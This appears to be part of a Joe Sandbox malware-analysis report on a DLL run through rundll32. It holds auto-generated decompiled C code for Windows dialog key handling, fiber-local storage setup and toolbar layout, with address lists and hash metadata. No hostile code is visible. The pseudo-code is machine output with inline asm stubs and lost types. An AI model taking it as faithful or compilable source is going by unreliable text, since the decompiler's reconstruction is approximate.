                                                                        										if( *((intOrPtr*)(_t202 + 0x4c)) == _t197) {
                                                                        											goto L47;
                                                                        										}
                                                                        										_push(_t197);
                                                                        										_push(_t197);
                                                                        										_push(_t197);
                                                                        										_push(1);
                                                                        										_push(0xfffffdd9);
                                                                        										_push(_t202);
                                                                        										 *(_t210 - 4) = _t197;
                                                                        										E1002042B();
                                                                        										 *(_t210 - 4) =  *(_t210 - 4) | 0xffffffff;
                                                                        										goto L90;
                                                                        									}
                                                                        									MessageBeep(_t197);
                                                                        									goto L47;
                                                                        								} else {
                                                                        									L75:
                                                                        									_t202 = E1000FAE5( *(_t210 + 8),  *((intOrPtr*)(_t210 - 0x20)));
                                                                        									__eflags = _t202 - _t197;
                                                                        									if(_t202 == _t197) {
                                                                        										goto L47;
                                                                        									}
                                                                        									goto L76;
                                                                        								}
                                                                        							}
                                                                        							if(__eflags == 0) {
                                                                        								L74:
                                                                        								_t197 = 0;
                                                                        								__eflags = 0;
                                                                        								goto L75;
                                                                        							}
                                                                        							__eflags = _t185 - 3;
                                                                        							if(_t185 == 3) {
                                                                        								goto L74;
                                                                        							}
                                                                        							__eflags = _t185 - 9;
                                                                        							if(_t185 == 9) {
                                                                        								__eflags = _t119 & 0x00000002;
                                                                        								if((_t119 & 0x00000002) != 0) {
                                                                        									goto L47;
                                                                        								}
                                                                        								_t153 = GetKeyState(0x10);
                                                                        								_t207 =  *(_t210 + 8);
                                                                        								__eflags = _t153;
                                                                        								_t180 = 0 | _t153 < 0x00000000;
                                                                        								_t185 = _t207;
                                                                        								_t154 = E1002057B(_t207, 0, _t153 < 0);
                                                                        								__eflags = _t154;
                                                                        								if(_t154 == 0) {
                                                                        									goto L47;
                                                                        								}
                                                                        								__eflags =  *(_t154 + 4);
                                                                        								if( *(_t154 + 4) == 0) {
                                                                        									_t155 =  *_t154;
                                                                        									__eflags = _t155;
                                                                        									if(_t155 == 0) {
                                                                        										_t185 = _t207;
                                                                        										_t156 = E10006C66(_t207,  *((intOrPtr*)(_t210 - 0x1c)), _t180);
                                                                        									} else {
                                                                        										_t156 = E100220EE(_t210, _t155);
                                                                        									}
                                                                        									_t198 = _t156;
                                                                        									__eflags = _t198;
                                                                        									if(_t198 != 0) {
                                                                        										 *( *((intOrPtr*)(_t207 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t207 + 0x48)) + 0x6c) & 0x00000000;
                                                                        										E1000F667(_t198);
                                                                        										E1000FA6A(_t185, _t210,  *(_t210 - 0x14), _t198);
                                                                        										_pop(_t185);
                                                                        									}
                                                                        								} else {
                                                                        									_t160 =  *(_t154 + 4);
                                                                        									_t185 = _t160;
                                                                        									 *((intOrPtr*)( *_t160 + 0xac))(_t192);
                                                                        								}
                                                                        								goto L90;
                                                                        							}
                                                                        							__eflags = _t185 - 0xd;
                                                                        							if(_t185 == 0xd) {
                                                                        								goto L68;
                                                                        							}
                                                                        							goto L47;
                                                                        						}
                                                                        						_t163 = _t118;
                                                                        						__eflags = _t163;
                                                                        						if(_t163 == 0) {
                                                                        							L33:
                                                                        							_t164 = E1000F57E( *((intOrPtr*)(_t210 - 0x1c)), _t192);
                                                                        							__eflags =  *(_t210 - 0x18) - 0x102;
                                                                        							if( *(_t210 - 0x18) != 0x102) {
                                                                        								L35:
                                                                        								_t185 = _t192->wParam;
                                                                        								__eflags = _t185 - 9;
                                                                        								if(_t185 != 9) {
                                                                        									L37:
                                                                        									__eflags = _t185 - 0x20;
                                                                        									if(__eflags != 0) {
                                                                        										_t165 = E1000F922(_t180, _t185, __eflags,  *(_t210 + 8),  *((intOrPtr*)(_t210 - 0x1c)), _t192);
                                                                        										__eflags = _t165;
                                                                        										if(_t165 == 0) {
                                                                        											goto L47;
                                                                        										}
                                                                        										_t166 =  *(_t165 + 4);
                                                                        										__eflags = _t166;
                                                                        										if(_t166 == 0) {
                                                                        											goto L47;
                                                                        										} else {
                                                                        											_t185 = _t166;
                                                                        											E1000A71A(_t166, _t192);
                                                                        											goto L90;
                                                                        										}
                                                                        									}
                                                                        									goto L38;
                                                                        								}
                                                                        								__eflags = _t164 & 0x00000002;
                                                                        								if((_t164 & 0x00000002) != 0) {
                                                                        									goto L47;
                                                                        								}
                                                                        								goto L37;
                                                                        							}
                                                                        							__eflags = _t164 & 0x00000084;
                                                                        							if((_t164 & 0x00000084) != 0) {
                                                                        								goto L47;
                                                                        							}
                                                                        							goto L35;
                                                                        						}
                                                                        						__eflags = _t163 != 4;
                                                                        						if(_t163 != 4) {
                                                                        							goto L47;
                                                                        						}
                                                                        						__eflags =  *(_t210 - 0x14);
                                                                        						if( *(_t210 - 0x14) != 0) {
                                                                        							L32:
                                                                        							__eflags = _t192->wParam - 0x20;
                                                                        							if(_t192->wParam == 0x20) {
                                                                        								goto L47;
                                                                        							}
                                                                        							goto L33;
                                                                        						}
                                                                        						_t169 = GetKeyState(0x12);
                                                                        						__eflags = _t169;
                                                                        						if(_t169 >= 0) {
                                                                        							goto L47;
                                                                        						}
                                                                        						goto L32;
                                                                        					} else {
                                                                        						_t208 =  *(_t210 - 0x14);
                                                                        						while( *(_t208 + 0x4c) == 0 && E100220EE(_t210, GetParent( *(_t208 + 0x1c))) !=  *(_t210 + 8)) {
                                                                        							_t208 = E100220EE(_t210, GetParent( *(_t208 + 0x1c)));
                                                                        							if(_t208 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						if(_t208 == 0) {
                                                                        							L17:
                                                                        							__eflags =  *(_t210 - 0x18) - 0x101;
                                                                        							if( *(_t210 - 0x18) == 0x101) {
                                                                        								L20:
                                                                        								__eflags = _t208;
                                                                        								if(_t208 == 0) {
                                                                        									L26:
                                                                        									_t192 =  *(_t210 + 0xc);
                                                                        									goto L27;
                                                                        								}
                                                                        								_t209 =  *(_t208 + 0x4c);
                                                                        								__eflags = _t209;
                                                                        								if(_t209 == 0) {
                                                                        									goto L26;
                                                                        								}
                                                                        								_t171 =  *(_t210 + 0xc)->wParam;
                                                                        								__eflags = _t171 - 0xd;
                                                                        								if(_t171 != 0xd) {
                                                                        									L24:
                                                                        									__eflags = _t171 - 0x1b;
                                                                        									if(_t171 != 0x1b) {
                                                                        										goto L26;
                                                                        									}
                                                                        									__eflags =  *(_t209 + 0x80) & 0x00000002;
                                                                        									if(( *(_t209 + 0x80) & 0x00000002) != 0) {
                                                                        										L38:
                                                                        										_t123 = 0;
                                                                        										L54:
                                                                        										 *[fs:0x0] =  *((intOrPtr*)(_t210 - 0xc));
                                                                        										return _t123;
                                                                        									}
                                                                        									goto L26;
                                                                        								}
                                                                        								__eflags =  *(_t209 + 0x80) & 0x00000001;
                                                                        								if(( *(_t209 + 0x80) & 0x00000001) != 0) {
                                                                        									goto L38;
                                                                        								}
                                                                        								goto L24;
                                                                        							}
                                                                        							__eflags =  *(_t210 - 0x18) - _t180;
                                                                        							if( *(_t210 - 0x18) == _t180) {
                                                                        								goto L20;
                                                                        							}
                                                                        							__eflags =  *(_t210 - 0x18) - 0x102;
                                                                        							if( *(_t210 - 0x18) != 0x102) {
                                                                        								goto L26;
                                                                        							}
                                                                        							goto L20;
                                                                        						}
                                                                        						_t172 =  *(_t208 + 0x4c);
                                                                        						if(_t172 == 0 ||  *(_t172 + 0x54) == 0) {
                                                                        							goto L17;
                                                                        						} else {
                                                                        							_t173 =  *(_t172 + 0x54);
                                                                        							_t185 =  *_t173;
                                                                        							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t210 + 0xc));
                                                                        							if(_t174 != 0) {
                                                                        								goto L17;
                                                                        							} else {
                                                                        								_t123 = _t174 + 1;
                                                                        								goto L54;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x1000fe5d
                                                                        0x1000fe61
                                                                        0x1000fe66
                                                                        0x1000fe6d
                                                                        0x1000fe73
                                                                        0x1000fe73
                                                                        0x1000fe77
                                                                        0x1000fe7b
                                                                        0x1000fe81
                                                                        0x1000fe81
                                                                        0x1000fe85
                                                                        0x1000fe95
                                                                        0x1000fe9a
                                                                        0x1000fe9c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe9e
                                                                        0x1000fea1
                                                                        0x1000fea3
                                                                        0x00000000
                                                                        0x1000fea5
                                                                        0x1000fea6
                                                                        0x1000fea8
                                                                        0x00000000
                                                                        0x1000fea8
                                                                        0x1000fea3
                                                                        0x00000000
                                                                        0x1000fe85
                                                                        0x1000fe7d
                                                                        0x1000fe7f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe7f
                                                                        0x1000fe6f
                                                                        0x1000fe71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe71
                                                                        0x1000fe33
                                                                        0x1000fe36
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe3c
                                                                        0x1000fe3f
                                                                        0x1000fe52
                                                                        0x1000fe52
                                                                        0x1000fe57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe57
                                                                        0x1000fe43
                                                                        0x1000fe49
                                                                        0x1000fe4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fd69
                                                                        0x1000fd69
                                                                        0x1000fd72
                                                                        0x1000fd93
                                                                        0x1000fd97
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fd97
                                                                        0x1000fd9b
                                                                        0x1000fdc0
                                                                        0x1000fdc0
                                                                        0x1000fdc7
                                                                        0x1000fdd7
                                                                        0x1000fdd7
                                                                        0x1000fdd9
                                                                        0x1000fe0b
                                                                        0x1000fe0b
                                                                        0x00000000
                                                                        0x1000fe0b
                                                                        0x1000fddb
                                                                        0x1000fdde
                                                                        0x1000fde0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fde5
                                                                        0x1000fde9
                                                                        0x1000fded
                                                                        0x1000fdfc
                                                                        0x1000fdfc
                                                                        0x1000fe00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fe02
                                                                        0x1000fe09
                                                                        0x1000fe87
                                                                        0x1000fe87
                                                                        0x1000ff67
                                                                        0x1000ff6c
                                                                        0x1000ff75
                                                                        0x1000ff75
                                                                        0x00000000
                                                                        0x1000fe09
                                                                        0x1000fdef
                                                                        0x1000fdf6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fdf6
                                                                        0x1000fdc9
                                                                        0x1000fdcc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fdce
                                                                        0x1000fdd5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000fdd5
                                                                        0x1000fd9d
                                                                        0x1000fda2
                                                                        0x00000000
                                                                        0x1000fdaa
                                                                        0x1000fdaa
                                                                        0x1000fdb0
                                                                        0x1000fdb3
                                                                        0x1000fdb8
                                                                        0x00000000
                                                                        0x1000fdba
                                                                        0x1000fdba
                                                                        0x00000000
                                                                        0x1000fdba
                                                                        0x1000fdb8
                                                                        0x1000fda2
                                                                        0x1000fd63

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                        • String ID:
                                                                        • API String ID: 2999224188-0
                                                                        • Opcode ID: fb21a70da8b2322adeae24ed3c2c6993691ff0b11f238f5cd034cdf1d19b064f
                                                                        • Instruction ID: 21539f8b15833155cbabaeec37cc23cdda9b79cec711f9471128e86a6a6d016e
                                                                        • Opcode Fuzzy Hash: fb21a70da8b2322adeae24ed3c2c6993691ff0b11f238f5cd034cdf1d19b064f
                                                                        • Instruction Fuzzy Hash: DFC1D33590024AAFEB21DB61C845ABE7BF5EF443D0F11402EF841AB566CB75EC80EB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E10015384() {
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t7;
                                                                        				struct HINSTANCE__* _t9;
                                                                        				struct HINSTANCE__* _t11;
                                                                        				long _t12;
                                                                        				_Unknown_base(*)()* _t16;
                                                                        				void* _t22;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t32;
                                                                        
                                                                        				if(E100138E5() != 0) {
                                                                        					_push(_t30);
                                                                        					_t26 = GetModuleHandleA("kernel32.dll");
                                                                        					__eflags = _t26;
                                                                        					if(_t26 != 0) {
                                                                        						_t30 = GetProcAddress;
                                                                        						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
                                                                        						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
                                                                        						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
                                                                        						_t16 = GetProcAddress(_t26, "FlsFree");
                                                                        						__eflags =  *0x1004f5e0;
                                                                        						 *0x1004f5e8 = _t16;
                                                                        						if( *0x1004f5e0 == 0) {
                                                                        							 *0x1004f5e0 = TlsGetValue;
                                                                        							 *0x1004f5e4 = TlsSetValue;
                                                                        							 *0x1004f5dc = E10015164;
                                                                        							 *0x1004f5e8 = TlsFree;
                                                                        						}
                                                                        					}
                                                                        					_t7 =  *0x1004f5dc(E1001520E);
                                                                        					__eflags = _t7 - 0xffffffff;
                                                                        					 *0x1004c848 = _t7;
                                                                        					if(__eflags == 0) {
                                                                        						L9:
                                                                        						E1001516D();
                                                                        						_t9 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_push(0x8c);
                                                                        						_push(1);
                                                                        						_t32 = E1001382A(_t22, 1, _t30, __eflags);
                                                                        						__eflags = _t32;
                                                                        						if(_t32 == 0) {
                                                                        							goto L9;
                                                                        						} else {
                                                                        							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
                                                                        							__eflags = _t11;
                                                                        							if(_t11 == 0) {
                                                                        								goto L9;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
                                                                        								 *((intOrPtr*)(_t32 + 0x14)) = 1;
                                                                        								_t12 = GetCurrentThreadId();
                                                                        								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
                                                                        								 *_t32 = _t12;
                                                                        								_t9 = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t9;
                                                                        				} else {
                                                                        					E1001516D();
                                                                        					return 0;
                                                                        				}
                                                                        			}















                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                        • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                          • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                        • API String ID: 2355849793-282957996
                                                                        • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                        • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				intOrPtr* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				int _v48;
                                                                        				void* _v52;
                                                                        				struct tagRECT _v68;
                                                                        				struct tagRECT _v84;
                                                                        				struct tagRECT _v100;
                                                                        				struct HDWP__* _v132;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t188;
                                                                        				signed int _t190;
                                                                        				signed int _t192;
                                                                        				intOrPtr* _t198;
                                                                        				intOrPtr _t206;
                                                                        				int _t208;
                                                                        				signed int _t210;
                                                                        				signed int _t211;
                                                                        				signed int _t214;
                                                                        				signed int _t215;
                                                                        				signed int _t221;
                                                                        				void* _t225;
                                                                        				intOrPtr _t233;
                                                                        				intOrPtr _t234;
                                                                        				int _t243;
                                                                        				signed int _t251;
                                                                        				signed int _t256;
                                                                        				long _t263;
                                                                        				intOrPtr _t264;
                                                                        				int _t273;
                                                                        				signed int _t280;
                                                                        				signed int _t287;
                                                                        				intOrPtr* _t297;
                                                                        				intOrPtr _t302;
                                                                        				signed int _t310;
                                                                        				signed int _t312;
                                                                        				intOrPtr _t319;
                                                                        				signed int _t325;
                                                                        				intOrPtr _t326;
                                                                        				signed int _t329;
                                                                        				int _t334;
                                                                        				intOrPtr* _t341;
                                                                        
                                                                        				_t297 = __ecx;
                                                                        				E1002F49A( &_v28, _a8, _a12);
                                                                        				if(IsRectEmpty(_t297 + 0xac) != 0) {
                                                                        					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
                                                                        					_t188 = _v84.right - _v84.left;
                                                                        					_t302 = _v84.bottom - _v84.top;
                                                                        				} else {
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
                                                                        					_t188 = _v68.right - _v68.left;
                                                                        					_t302 = _v68.bottom - _v68.top;
                                                                        				}
                                                                        				_t334 = 0;
                                                                        				_v44 = _t188;
                                                                        				_v40 = _t302;
                                                                        				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
                                                                        					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
                                                                        				} else {
                                                                        					_v132 = 0;
                                                                        				}
                                                                        				_t190 =  *0x1004efa0; // 0x2
                                                                        				_v36 =  ~_t190;
                                                                        				_t192 =  *0x1004efa4; // 0x2
                                                                        				_v32 =  ~_t192;
                                                                        				_v16 = _t334;
                                                                        				_v12 = _t334;
                                                                        				_v8 = _t334;
                                                                        				if( *(_t297 + 0x9c) <= _t334) {
                                                                        					L72:
                                                                        					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
                                                                        						EndDeferWindowPos(_v132);
                                                                        					}
                                                                        					SetRectEmpty( &_v100);
                                                                        					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
                                                                        					if(_a8 == _t334 || _a12 == _t334) {
                                                                        						if(_v28 != _t334) {
                                                                        							_v28 = _v28 + _v100.left - _v100.right;
                                                                        						}
                                                                        					}
                                                                        					if(_a8 == _t334 || _a12 != _t334) {
                                                                        						if(_v24 != _t334) {
                                                                        							_v24 = _v24 + _v100.top - _v100.bottom;
                                                                        						}
                                                                        					}
                                                                        					_t198 = _a4;
                                                                        					 *_t198 = _v28;
                                                                        					 *((intOrPtr*)(_t198 + 4)) = _v24;
                                                                        					return _t198;
                                                                        				} else {
                                                                        					do {
                                                                        						_t341 = E1002CE0B(_t297, _v8);
                                                                        						_v20 = _t341;
                                                                        						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
                                                                        						if(_t341 == _t334) {
                                                                        							if(_t206 != _t334) {
                                                                        								goto L71;
                                                                        							}
                                                                        							L58:
                                                                        							_t208 = _v16;
                                                                        							if(_t208 != _t334) {
                                                                        								if(_a12 == _t334) {
                                                                        									_t310 = _v36 + _t208 -  *0x1004efa0;
                                                                        									_v36 = _t310;
                                                                        									if(_v28 <= _t310) {
                                                                        										_v28 = _t310;
                                                                        									}
                                                                        									_t210 = _v32;
                                                                        									if(_v24 <= _t210) {
                                                                        										_v24 = _t210;
                                                                        									}
                                                                        									_t211 =  *0x1004efa4; // 0x2
                                                                        									_v32 =  ~_t211;
                                                                        								} else {
                                                                        									_t312 = _v32 + _t208 -  *0x1004efa4;
                                                                        									_t214 = _v36;
                                                                        									_v32 = _t312;
                                                                        									if(_v28 <= _t214) {
                                                                        										_v28 = _t214;
                                                                        									}
                                                                        									if(_v24 <= _t312) {
                                                                        										_v24 = _t312;
                                                                        									}
                                                                        									_t215 =  *0x1004efa0; // 0x2
                                                                        									_v36 =  ~_t215;
                                                                        								}
                                                                        								_v16 = _t334;
                                                                        							}
                                                                        							goto L71;
                                                                        						}
                                                                        						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
                                                                        							L51:
                                                                        							if(_v12 != _t334) {
                                                                        								goto L71;
                                                                        							}
                                                                        							L52:
                                                                        							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
                                                                        							goto L71;
                                                                        						}
                                                                        						_t221 =  *(_t341 + 0x7c);
                                                                        						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
                                                                        							asm("sbb eax, eax");
                                                                        							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
                                                                        						} else {
                                                                        							_t225 = 6;
                                                                        						}
                                                                        						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
                                                                        						E100086B2( &_v68, _v36, _v32, _v52, _v48);
                                                                        						GetWindowRect( *(_t341 + 0x1c),  &_v84);
                                                                        						E10028E5A(_t297,  &_v84);
                                                                        						if(_a12 == _t334) {
                                                                        							_t233 = _v84.top;
                                                                        							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                        								OffsetRect( &_v68, _t334, _t233 - _v68.top);
                                                                        							}
                                                                        							_t234 = _v68.bottom;
                                                                        							_t319 = _v40;
                                                                        							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                        								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
                                                                        								_t256 = _v32;
                                                                        								if(_t325 > _t256) {
                                                                        									_t256 = _t325;
                                                                        								}
                                                                        								OffsetRect( &_v68, _t334, _t256 - _v68.top);
                                                                        							}
                                                                        							if(_v12 == _t334) {
                                                                        								if(_v68.top < _v40 -  *0x1004efa4) {
                                                                        									goto L44;
                                                                        								}
                                                                        								_t247 = _v8;
                                                                        								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
                                                                        									goto L44;
                                                                        								} else {
                                                                        									goto L56;
                                                                        								}
                                                                        							} else {
                                                                        								_t251 =  *0x1004efa4; // 0x2
                                                                        								_v12 = _t334;
                                                                        								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
                                                                        								L44:
                                                                        								if(EqualRect( &_v68,  &_v84) == 0) {
                                                                        									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										_t341 = _v20;
                                                                        										_t334 = 0;
                                                                        									}
                                                                        									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                        								}
                                                                        								_v32 = _v68.top -  *0x1004efa4 + _v48;
                                                                        								_t243 = _v52;
                                                                        								if(_v16 > _t243) {
                                                                        									goto L52;
                                                                        								} else {
                                                                        									_v16 = _t243;
                                                                        									goto L51;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t263 = _v84.left;
                                                                        							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                        								OffsetRect( &_v68, _t263 - _v68.left, _t334);
                                                                        							}
                                                                        							_t264 = _v68.right;
                                                                        							_t326 = _v44;
                                                                        							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
                                                                        								L22:
                                                                        								if(_v12 == _t334) {
                                                                        									if(_v68.left < _v44 -  *0x1004efa0) {
                                                                        										L27:
                                                                        										if(EqualRect( &_v68,  &_v84) == 0) {
                                                                        											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												_t341 = _v20;
                                                                        												_t334 = 0;
                                                                        											}
                                                                        											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                        										}
                                                                        										_v36 = _v52 -  *0x1004efa0 + _v68.left;
                                                                        										_t273 = _v48;
                                                                        										if(_v16 <= _t273) {
                                                                        											_v16 = _t273;
                                                                        										}
                                                                        										goto L52;
                                                                        									}
                                                                        									_t277 = _v8;
                                                                        									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
                                                                        										goto L27;
                                                                        									} else {
                                                                        										L56:
                                                                        										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
                                                                        										_v12 = 1;
                                                                        										goto L58;
                                                                        									}
                                                                        								}
                                                                        								_t280 =  *0x1004efa0; // 0x2
                                                                        								_v12 = _t334;
                                                                        								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
                                                                        								goto L27;
                                                                        							} else {
                                                                        								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
                                                                        								_t287 = _v36;
                                                                        								if(_t329 > _t287) {
                                                                        									_t287 = _t329;
                                                                        								}
                                                                        								OffsetRect( &_v68, _t287 - _v68.left, _t334);
                                                                        								goto L22;
                                                                        							}
                                                                        						}
                                                                        						L71:
                                                                        						_v8 = _v8 + 1;
                                                                        					} while (_v8 <  *(_t297 + 0x9c));
                                                                        					goto L72;
                                                                        				}
                                                                        			}
                                                                        0x00000000
                                                                        0x1002d689
                                                                        0x1002d3ca
                                                                        0x1002d61a
                                                                        0x1002d61d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d623
                                                                        0x1002d62b
                                                                        0x00000000
                                                                        0x1002d62b
                                                                        0x1002d3d0
                                                                        0x1002d3d5
                                                                        0x1002d3e7
                                                                        0x1002d3ec
                                                                        0x1002d3db
                                                                        0x1002d3dd
                                                                        0x1002d3dd
                                                                        0x1002d3fa
                                                                        0x1002d40f
                                                                        0x1002d41b
                                                                        0x1002d427
                                                                        0x1002d42f
                                                                        0x1002d540
                                                                        0x1002d546
                                                                        0x1002d559
                                                                        0x1002d559
                                                                        0x1002d55f
                                                                        0x1002d562
                                                                        0x1002d567
                                                                        0x1002d57a
                                                                        0x1002d57c
                                                                        0x1002d581
                                                                        0x1002d583
                                                                        0x1002d583
                                                                        0x1002d58e
                                                                        0x1002d58e
                                                                        0x1002d597
                                                                        0x1002d642
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d648
                                                                        0x1002d64d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d59d
                                                                        0x1002d59d
                                                                        0x1002d5af
                                                                        0x1002d5b2
                                                                        0x1002d5b8
                                                                        0x1002d5c8
                                                                        0x1002d5d0
                                                                        0x1002d5e7
                                                                        0x1002d5e8
                                                                        0x1002d5e9
                                                                        0x1002d5ea
                                                                        0x1002d5eb
                                                                        0x1002d5ee
